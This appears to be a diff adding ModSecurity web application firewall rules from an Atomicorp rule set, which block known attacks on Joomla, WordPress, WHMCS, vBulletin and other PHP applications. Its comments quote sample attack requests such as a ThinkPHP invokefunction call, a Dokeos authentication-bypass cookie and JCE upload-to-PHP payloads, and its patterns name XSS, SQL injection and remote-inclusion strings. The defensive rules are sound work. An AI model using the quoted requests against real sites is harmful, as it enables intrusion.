+SecRule ARGS:/comment/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+#plugin_googlemap2_proxy.php?url=loxer.cf
+SecRule REQUEST_URI "plugin_googlemap(?:2_proxy|3_kmlprxy)\.php\?url=(.*)" "phase:1,t:none,t:urlDecodeUni,t:lowercase,capture,chain,log,deny,status:403,auditlog,id:336468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Google Maps plugin for Joomla probe'"
+SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
+
+
+#/plus/download.php?open
+SecRule REQUEST_URI "/plus/download\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336467,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible chained PHP array injection attack',logdata:'%{TX.0}'"
+SecRule &ARGS:/^arrs1\[\]/ "@gt 1"
+
+SecRule REQUEST_URI "/ofc_upload_image\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336460,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Open Flash Charts File Upload Attack',logdata:'%{TX.0}'"
+SecRule ARGS:name "\.(?:php|pl|cgi)" "t:none,t:lowercase"
+
+#rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url
+SecRule REQUEST_URI "/rsession_init\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336459,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Plesk secret_key attack',logdata:'%{TX.0}'"
+SecRule ARGS:failure_redirect_url "^(.*)$" "capture,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule TX:1 "!@rx ://%{SERVER_NAME}/" "t:none,t:lowercase"
+
+
+
+#WP pingback
+#Only uses two headers, URL and Host
+#Check for useragent header, if missing, attack
+SecRule REQUEST_URI "/xmlrpc\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336359,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress pingback zombie attack',logdata:'%{TX.0}'"
+SecRule XML:/* "pingback\.ping" "t:none,t:lowercase,chain"
+SecRule &REQUEST_HEADERS:Host "@eq 1"  "t:none,chain"
+SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
+
+#Vbulletin zeroday
+#upgrade.php
+#version=install
+#htmldata=username
+SecRule REQUEST_URI "/upgrade\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331358,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vbulletin zero day attack',logdata:'%{TX.0}'"
+SecRule ARGS:version "install" "t:none,t:lowercase,chain"
+SecRule ARGS:htmldata[username] ".*" "t:none,t:lowercase,t:urlDecodeUni"
+
+#AES_ENCRYPT
+SecRule REQUEST_URI "/(?:clientarea\.php\?action=details|viewticket\.php)" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331357,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WHMCS SQL injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:firstname|ARGS:lastname|ARGS:/^tid/ "(?:aes_encrypt|tbl(?:admins|clients|hosting|servers|tickets|contact|registars|invoices|orders|paymentgateways|verificationdata|gatewaylog|domains|accounts|adminlog))" "t:none,t:lowercase"
+
+#WP 3.6 and lower serialize name change exploit
+SecRule REQUEST_URI "wp-admin/profile.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:321357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress serialize name change attack',logdata:'%{TX.0}'"
+SecRule ARGS:first_name|ARGS:last_name|ARGS:display_name ":" "t:none,t:urlDecodeUni"
+
+#configuration.php-dist
+SecRule REQUEST_FILENAME "configuration\.php-dist" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:321356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla probe',logdata:'%{TX.0}'"
+
+#/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
+SecRule REQUEST_FILENAME "/editor/filemanager/connectors/php/connector\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:388000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Access vulnerable FCKeditor file upload connector (Disable if you have configured this connector to require authentication)',logdata:'%{TX.0}'"
+SecRule ARGS:command "(?:getfoldersandfiles|fileupload)"  "t:none,t:urlDecodeUni,t:lowercase"
+
+#PHP version probe using easter eggs
+SecRule REQUEST_URI "php(?:e9568f3[56]-d428-11d2-a769-00aa001acf42|b8b5f2a0-3c92-11d3-a3a9-4c7b08c10000)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI "phpe9568f34-d428-11d2-a769-00aa001acf42" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"
+#INJECTION RULES
+##RFI/injection rules
+SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// php:// data://" "id:333866,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+                SecAction "phase:2,id:309001,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
+
+#plugin injection
+SecRule REQUEST_FILENAME "\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:390760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
+SecRule ARGS:/plugin_dir/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+#e107 vulns
+SecRule ARGS:ifile|ARGS:plugindir|ARGS:THEMES_DIRECTORY "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:393756,rev:1,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:e107 RFI attack',logdata:'%{TX.0}'"
+
+#390655
+SecRule ARGS:/^SYSURL/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390655,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SYSURL RFI attack Vulnerability'"
+
+SecRule ARGS:get "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390656,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get variable RFI attack Vulnerability'"
+
+
+# Rule 310019: generic remote file inclusion vulns
+SecRule ARGS:/gallery_basedir/|!ARGS:include_location "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:391760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
+
+
+SecRule REQUEST_FILENAME "tiki-index\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:395760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
+SecRule ARGS:page "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310054:  b2 cafelog gm-2-b2.php remote file include attempt
+SecRule REQUEST_FILENAME "/gm-2-b2\.php" "phase:2,id:310054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2 cafelog gm-2-b2.php remote file include attempt',chain"
+SecRule REQUEST_URI "b2inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310055:  BLNews objects.inc.php4 remote file include attempt
+SecRule REQUEST_FILENAME "/objects\.inc\.php" "phase:2,id:310055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BLNews objects.inc.php4 remote file include attempt',chain"
+SecRule REQUEST_URI "server\[path\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310056:  ttCMS header.php remote file include attempt
+SecRule REQUEST_FILENAME "/admin/templates/header.php" "phase:2,chain,id:310056,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttCMS header.php remote file include attempt'"
+SecRule REQUEST_URI "admin_root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310059:  pmachine remote file include attempt
+SecRule REQUEST_URI "lib\.inc\.php" "phase:2,id:310059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pmachine remote file include attempt',chain"
+SecRule ARGS:pm_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310090:/forum/viewtopic.php?x=http://
+SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,chain,id:310090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum remote include attempt'"
+SecRule ARGS:x "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310227:/auth.php?path=http://[attacker]/
+SecRule REQUEST_FILENAME  "/authphp" "phase:2,chain,id:310227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.php remote file inclusion attempt'"
+SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310233: PHP Form Mail Script File Incusion vuln
+SecRule REQUEST_FILENAME "/inc/formmail\.inc\.php" "phase:2,chain,id:310233,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP formmail.inc.php file inclusion attempt'"
+SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310234: download Center Lite command execution vuln
+SecRule REQUEST_FILENAME "/inc/download_center_lite\.inc\.php" "phase:2,chain,id:310234,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: download Center Lite download_center_lite.inc.php command execution attempt'"
+SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310235: /modules/mod_mainmenu.php?mosConfig_absolute_path=http://
+SecRule REQUEST_FILENAME "/modules/mod_mainmenu\.php" "phase:2,chain,id:310235,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mod_mainmenu.php command execution attempt'"
+SecRule ARGS:mosConfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+# Rule 310236: phpWebLog command execution
+SecRule REQUEST_FILENAME "/init\.inc\.php" "phase:2,chain,id:310236,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php command execution attempt'"
+SecRule ARGS:G_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310238: mcNews command execution
+SecRule REQUEST_FILENAME "/admin/header\.php" "phase:2,chain,id:310238,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews header.php command execution attempt'"
+SecRule ARGS:skinfile "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+# Rule 310240: votebox
+SecRule REQUEST_URI "/votebox\.php\?voteboxpath=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310240,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: votebox.php command execution attempt'"
+
+# Rule 310267:  Remote File Inclusion Vulnerability in phpWebLog
+SecRule REQUEST_URI  "/include/init\.inc\.php\?G_path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php remote file inclusion attempt'"
+
+
+# Rule 310293:  PHPOpenChat
+SecRule ARGS:poc_root_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: poc_root_path remote file inclusion attempt'"
+
+
+# Rule 310295:  PHPOpenChat
+SecRule REQUEST_URI "/poc\.php\?sourcedir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPOpenChat poc.php remote file inclusion attempt'"
+
+
+# Rule 310297: mcNews Remote command execution
+SecRule REQUEST_URI "/admin/install\.php\?l=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310297,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews install.php remote command execution attempt'"
+
+SecRule REQUEST_FILENAME "/page_tail\.php" "chain,id:390282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page_tail RFI injection Vulnerability'"
+SecRule ARGS:includePath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|^test)"
+
+
+##############index.php bypass################################
+SecRule REQUEST_FILENAME "index\.php" "id:333867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309002,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
+
+
+# Rule 310237: phpWebLog command execution
+SecRule REQUEST_FILENAME "/backend/addons/links/index\.php" "phase:2,chain,id:310237,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog backend index.php command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/"
+
+
+# Rule 310268:  Remote File Inclusion Vulnerability in phpWebLog
+SecRule REQUEST_URI  "addons/links/index\.php\?path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310268,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog links/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310289:  PHP-Nuke remote file include attempt
+SecRule REQUEST_URI "/index\.php*file=*(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+#390651
+#Joomla! Shoutbox Pro Component "controller" Local File Inclusion Vulnerability
+SecRule ARGS:controller "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))" "phase:2,id:390651,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! Shoutbox Pro Component controller Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310274: Multiple Vulnerabilities in auraCMS
+SecRule ARGS:query "(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:310274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310337: Vortex Portal Remote File Inclusion and Path Disclosure
+#       Vulnerabilities
+SecRule ARGS:act "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310392:AlstraSoft EPay Pro Remote File Include Vulnerability
+SecRule REQUEST_URI "/epal/index\.php\?view=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019:honeypot catch
+SecRule REQUEST_URI "/index\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310580,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Page argument RFI injection attempt'"
+
+# Rule 310019: honeypot
+
+SecMarker END_PHP_JITP_INJECTION_RULES
+
+#/apps/files/ajax/scan.php?force=true&dir=&requesttoken=
+SecRule REQUEST_URI "/apps/files/ajax/scan\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331323,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential Owncloud information leakage attack blocked',logdata:'%{TX.0}'"
+SecRule ARGS:scan "true" "t:none,t:urlDecodeUni,t:lowercase"
+
+##############index.php rules################################
+SecRule REQUEST_FILENAME "index\.php" "id:333868,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309003,t:none,pass,nolog,noauditlog,skipAfter:END_INDEX_PHP_JITP"
+
+#/index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP
+SecRule ARGS:s "invokefunction"  "phase:2,deny,log,auditlog,id:393753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked',chain"
+SecRule ARGS:function "call_"  "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule ARGS:username|ARGS:password|ARGS:uid "tostring\("  "phase:2,deny,log,auditlog,id:393754,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP code injection attack blocked'"
+
+
+#GET /install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.0
+SecRule ARGS:install_demo_name "config_update\.php"  "phase:2,deny,log,auditlog,id:393752,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked'"
+
+
+SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:390737,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Image Upload - Arbitrary File Upload'"
+SecRule ARGS:option "com_simpleimageupload" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:view "upload" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:tmpl "component" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)"  "t:none,t:lowercase,t:urlDecodeUni"
+
+#/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=
+SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333458,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DOKEOS ce30 Authentication Bypass attack blocked'"
+SecRule ARGS:sso_cookie "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30" "t:none"
+
+
+#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
+#upload-dir=/&upload-overwrite=0&upload-name=0day&action=upload
+#upload-dir=/&upload-overwrite=1&action=upload
+SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333358,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential JCE image manager attack',logdata:'%{TX.0}'"
+SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
+SecRule ARGS:file "imgmanager" "t:none,t:lowercase,chain"
+SecRule ARGS:/upload/ ".*" "t:none,t:lowercase"
+
+#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw
+#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
+#json={"fn":"folderRename","args":["/0day.gif","0day.php"]}
+SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333359,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JCE image attempt to rename image file to PHP attack',logdata:'%{TX.0}'"
+SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
+SecRule ARGS:plugin "imgmanager" "t:none,t:lowercase,chain"
+SecRule ARGS:json "folderrename.*:.*(?:p(?:hp|l)|cgi)" "t:none,t:lowercase"
+
+#nonumbers plugin vuln
+#index.php?nn_qp=1&url=h
+SecRule ARGS:nn_qp "^1$"  "phase:2,chain,id:391663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:url "^(?:ht|f)tps?:/"  chain
+SecRule ARGS_NAMES "curl"
+
+#probe
+SecRule REQUEST_URI "/index\.php\?nn_qp=1&url=https?://[a-z0-9\.\-\_\/]+$"  "phase:2,id:391664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability Probe',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+# ibProArcade Module "user" SQL Injection Vulnerability
+SecRule ARGS:user "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"  "phase:2,id:391662,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Module user SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310251: citrusdb directory traversal
+#adjust these to your system, you might need to upload
+SecRule REQUEST_FILENAME "tools/index\.php" "phase:2,chain,id:310251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:load "\.\./"
+
+
+# Rule 310252: citrusdb upload authorization bypass (CAN-2005-0409)
+SecRule REQUEST_URI "citrusdb/tools/index\.php\?load=importcc\&submit=on" "phase:2,id:310252,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php upload authorization bypass attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310058:  ttforum remote file include attempt
+SecRule REQUEST_URI "forum/index\.php" "phase:2,id:310058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttforum remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "template="
+
+
+# Rule 310066:  IdeaBox notification.php file include
+SecRule REQUEST_URI "/index\.php" "phase:2,id:310066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IdeaBox file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:notification|cord)\.php"
+
+
+
+# Rule 310335: Dream4 Koobi CMS Index.PHP SQL Injection Vulnerability
+SecRule REQUEST_URI "/index\.php\?p=articles" "phase:2,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310335,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php SQL injection attempt'"
+SecRule ARGS:area "'"
+
+
+# Rule 310346:exoops Input Validation Flaws SQL injection and XSS
+SecRule ARGS:viewcat "\'" "phase:2,id:310346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310347:exoops Input Validation Flaws SQL injection and XSS
+SecRule REQUEST_URI "/modules/sections/index\.php\?op=viewarticle&artid=9\x2c+9\x2c+9" "phase:2,id:310347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops sections/index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310372:Lighthouse Development Squirrelcart SQL Injection Vulnerability
+SecRule ARGS:crn "\'" "phase:2,id:310372,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Lighthouse Squirrelcart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310382:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/index\.php\?mod=(?:pages|category)&(?:idp|id_ctg)=\'" "phase:2,id:310382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310405: phpMyAdmin convcharset Parameter Cross Site Scripting
+SecRule REQUEST_URI "/phpmyadmin/index\.php" "phase:2,chain,id:310405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin index.php convcharset parameter cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:convcharset "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310407: cubecart SQL injection
+SecRule ARGS:phpsessid "\'" "phase:2,id:310407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310425:phpbb plus
+SecRule REQUEST_FILENAME "/index\.php" "phase:2,chain,id:310425,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB index.php SQL injection attempt'"
+SecRule ARGS:c|ARGS:mark "'" "t:none,t:urlDecodeUni"
+
+
+
+# Rule 310445:squirrelcart SQL injection
